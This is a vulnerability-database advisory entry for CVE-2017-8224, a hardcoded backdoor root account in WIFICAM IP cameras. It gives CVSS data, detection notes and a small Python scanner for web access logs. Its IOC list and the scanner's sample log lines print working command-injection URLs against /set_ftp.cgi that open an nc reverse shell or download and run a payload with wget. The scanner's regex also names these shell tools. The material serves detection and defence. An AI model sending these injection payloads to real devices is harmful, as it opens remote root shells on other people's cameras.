CVE-2017-8224
Published: 2017-04-25
CVE-2017-8224: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.
Priority: P180; severity critical, CVSS 3.0 base score 9.8
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (ITW); public exploit available; listed in VulnCheck KEV
EPSS: 8.58% (94.4th percentile)
Description: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.
Detection & IOCs (extracted from sources)
url: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
url: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
url: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://192.168.1.1/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0
bytes: 0x0a 0x0a 0x0a 0x0a 0x01
- Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi whose `pwd` parameter contains shell metacharacters (e.g. `$(`, `nc`, `wget`); this parameter is the command-injection vector that yields RCE.
- Detect inbound Telnet connections to the device: the backdoor root account is reachable over Telnet.
- In captured binary configuration dumps from the device, the credentials sit at offset +138 (username) and +170 (password) bytes after the four-byte 0x0a sequence followed by 0x01; the default username is 'admin'.
- The exploit targets port 80 (CAM_PORT) by default, but some deployments host the camera's web interface on a non-standard port, so detection on the CGI paths should be port-agnostic.
- The connect-back shell in the PoC uses a hardcoded attacker IP (REMOTE_HOST 192.168.1.1) and port (REMOTE_PORT 1337); real-world attacks substitute arbitrary attacker-controlled values in the `pwd` parameter.
- Two payload encodings exist for the injection, URL-encoded spaces (%20) and plus-sign-encoded spaces (+), so detection signatures must account for both variants.
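The detection notes above, turned into a small access-log check (added example, not code from the advisory or from any vendor): it normalizes both the %20 and + space encodings through standard URL decoding, restricts matching to the two CGI paths named as the injection vector, and flags shell metacharacters in the decoded `pwd` value. The log lines are constructed samples; the client IPs and the `/get_status.cgi` path are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# CGI endpoints the advisory names as the command-injection vector.
VULN_PATHS = {"/set_ftp.cgi", "/ftptest.cgi"}
# Shell metacharacters and tool names that never belong in an FTP password.
SHELL_META = re.compile(r"\$\(|`|;|\|\||&&|\bnc\b|\bwget\b|\bsh\b")
# Apache/nginx-style access log: client, then "METHOD target HTTP/x.y".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\w+ (\S+) HTTP/[\d.]+"')


def check_request(target):
    """Return (path, decoded pwd) if the request target hits one of the
    vulnerable CGI paths with shell metacharacters in `pwd`, else None."""
    parts = urlsplit(target)
    if parts.path not in VULN_PATHS:
        return None
    # parse_qs decodes both %20 and '+' to a space, so one check covers
    # both payload encodings listed in the IOCs.
    params = parse_qs(parts.query, keep_blank_values=True)
    pwd = params.get("pwd", [""])[0]
    if SHELL_META.search(pwd):
        return parts.path, pwd
    return None


def scan_access_log(lines):
    """Return a list of (client_ip, path, decoded pwd) for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = check_request(m.group(2))
        if hit:
            findings.append((m.group(1),) + hit)
    return findings


# Constructed sample log lines (not captured traffic): two injection attempts
# using the two encodings from the IOCs, one benign FTP config change on the
# same CGI, and one unrelated (assumed) path that must not fire.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2017:10:00:01 +0000] "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0 HTTP/1.1" 200 42',
    '192.0.2.11 - - [25/Apr/2017:10:00:02 +0000] "GET /ftptest.cgi?loginuse=admin&loginpas=admin&pwd=$(wget+http://192.168.1.1/stufz&&./stuff) HTTP/1.1" 200 42',
    '192.0.2.12 - - [25/Apr/2017:10:00:03 +0000] "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=10.0.0.5&port=21&user=ftp&pwd=S3cret%21&dir=/&mode=PORT HTTP/1.1" 200 42',
    '192.0.2.13 - - [25/Apr/2017:10:00:04 +0000] "GET /get_status.cgi?pwd=$(id) HTTP/1.1" 200 42',
]

if __name__ == "__main__":
    for client, path, pwd in scan_access_log(SAMPLE_LOG):
        print(f"ALERT {client} {path} pwd={pwd!r}")
```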
CVSS provenance
- NVD, CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-r97g-5x4p-h964: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET
Status: unreviewed · 2022-05-17 · CVE-2017-8224 · CRITICAL · CWE-798
VulnCheck
wificam wireless_ip_camera_(p2p)_firmware: Use of Hard-coded Credentials
VulnCheck · 2017 · CVSS 9.8 · CVE-2017-8224 · CRITICAL
Affected: wificam wireless_ip_camera_(p2p)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
No detection rules found.
No writeups or analysis indexed.